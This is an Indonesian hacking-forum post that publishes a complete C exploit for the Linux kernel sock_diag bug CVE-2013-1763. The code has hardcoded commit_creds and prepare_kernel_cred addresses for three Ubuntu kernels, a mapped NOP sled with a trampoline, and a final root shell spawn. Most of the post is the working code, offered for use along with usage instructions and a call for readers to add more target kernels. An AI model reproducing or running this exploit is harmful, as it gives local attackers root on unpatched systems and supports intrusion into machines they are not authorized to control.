• Silahkan bergabung dengan chat kami di Telegram group kami di N3Forum - https://t.me/n3forum
  • Welcome to the Nyit-Nyit.Net - N3 forum! This is a forum where offline-online gamers, programmers and reverser community can share, learn, communicate and interact, offer services, sell and buy game mods, hacks, cracks and cheats related, including for iOS and Android.

    If you're a pro-gamer or a programmer or a reverser, we would like to invite you to Sign Up and Log In on our website. Make sure to read the rules and abide by it, to ensure a fair and enjoyable user experience for everyone.

RNDC [RNDC] SockDiag Exploit (CVE: 2013-1763)

dono

3 SMP
STAFF N3
Tukang Sapu
Riset yang lama membuahkan hasil yang manis pula, kembali 0day kernel akan direlease oleh periset dari RNDC, mudah2an memenuhi kriteria yang ditentukan oleh tim penilai IDSecconf, next HITB, and hopefully Black Hat, hehe god bless Underground Indonesia ~ quote dari kepala sekolah TK RNDC

Author: Chainloader

Penjelasan Singkat

Bug di Sock_diag_handler
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message
POCnya ini sementara hanya untuk sistem operasi dan kernel berikut ini:
  • Ubuntu 12.04.2 x86_64 kernel 3.5.0-23-generic
  • Ubuntu 12.10 x86_64 kernel 3.5.0-17-generic
  • Ubuntu 12.10 x86_64 kernel 3.7.0-7-generic
Silakan jika ingin menambahkan target lainnya. Exploit ini belum diujicoba pada arsitektur x86 karena tidak tersedianya komputer untuk ujicoba. Jika ingin mencoba, paling ganti trampoline dan creds nya. Trampolinenya cukup diambil dari push cred, menggunakan standar null pointer dereference.

Untuk Ubuntu 12.04.2 tidak bisa dikompilasi dengan pesan error sock_diag.h tidak ada. Cukup lakukan kompilasi pada Ubuntu versi 12.10, karena versi 12.04.2 memang masih belom official ditaruh. Jika ingin memeriksa, cukup periksa di /usr/include/linux.
Code:
/**
* Ini cuma berlaku buat Ubuntu aja, yang pake kernel 3.3.x sampe dengan dibawah 3.7.10 arsitektur x64 aja
* Kalo ditempat sampeyan ndak bisa gitu karna creds nya gak cucok, ane ga sempet ngumpulin creds ubuntu yang laen
* dan diharapken ditambah sendiri aja, taruh di list creds nya itu di dalem func main, kasih opsi juga ya.
* Kalo masih ga bisa juga ada dua kemungkinan, kernel sampeyan sudah di apgret atau fengshui dan nasib anda lagi ndak mujur
* Sock Diag ini modul nya masih rawan, jadi ndak semua distro punya, untuk fedora ane males soalnya dicengin mulu :( tambahin sndiri ya
* Dan tulung jangan sampe keluar komen dari mulut sampeyan ini All Kernel, ini bug spesifik doang, ndak ada itu namanya All In One Kernel Exploit
* Semua exploit itu spesifik bug triggered, plis deh ya :))
* CVE nya : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1763
*/

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <linux/utsname.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
nullcred() {
commit_creds(prepare_kernel_cred(0));
return -1;
}

char trampoline[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

int main(int argc, char*argv[]) {
int fd;
unsigned long mmap_start, mmap_size = 0x10000;
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
char buf[8192];

if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
printf("Gagal men gak bisa ngebikin sock_diag socketnya\n");
return -1;
}

memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;
req.r.udiag_states = -1;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

if(argc==1){
printf("==================================================\n");
printf(" POC CVE-2013-1763 sock_diag_handlers \n");
printf("--------------------------------------------------\n");
printf("Dimohon baca header nya biar ndak salah \n\n");
printf("List Ubuntu Kernelnyah : \n");
printf("[1] Ubuntu 12.10 x86_64 kernel 3.7.0-7-generic \n");
printf("[2] Ubuntu 12.10 x86_64 kernel 3.5.0-17-generic \n");
printf("[3] Ubuntu 12.04.2 x86_64 kernel 3.5.0-23-generic \n");
printf("--------------------------------------------------\n");
printf("Cara Pake: %s <nomor listnya>\n",argv[0]);
printf("Example: %s 1\n\n",argv[0]);
return 0;
}

/* Ubuntu 12.10 x86_64 kernel 3.7.0-7-generic */
else if(strcmp(argv[1],"1")==0){
commit_creds = (_commit_creds) 0xffffffff81083430;
prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff810838b0;
printf("[+] Crotz...\n");
}

/* Ubuntu 12.10 x86_64 kernel 3.5.0-17-generic */
else if(strcmp(argv[1],"2")==0){
commit_creds = (_commit_creds) 0xffffffff8107d180;
prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
printf("[+] Crotz...\n");
}

/* Ubuntu 12.04.2 x86_64 kernel 3.5.0-23-generic */
else if(strcmp(argv[1],"3")==0){
commit_creds = (_commit_creds) 0xffffffff8107ee30;
prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107f0c0;
printf("[+] Crotz...\n");
}
else {
printf("[-] inputnya yang bener dong...(#~_~)/||TEMBOK PAWON||\n");
return 0;
}

req.r.sdiag_family = 0x37;
mmap_start = 0x1a000;

if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
printf("Gagal nge'mmap men\n");
exit(1);
}
printf("[+] Crotz...\n");
*(unsigned long *)&trampoline[sizeof(trampoline)-sizeof(&nullcred)] = (unsigned long)nullcred;
memset((void *)mmap_start, 0x90, mmap_size);
memcpy((void *)mmap_start+mmap_size-sizeof(trampoline), trampoline, sizeof(trampoline));
send(fd, &req, sizeof(req), 0);
printf("[+] Crotz...\n");
if(!getuid())
printf("[+] Cruoooottzzzz muncraaaaatttssss...!!!\n");
system("/bin/sh");
}
Author: Chainloader

Source: http://rndc.or.id/wi...CVE:_2013-1763)
 
Top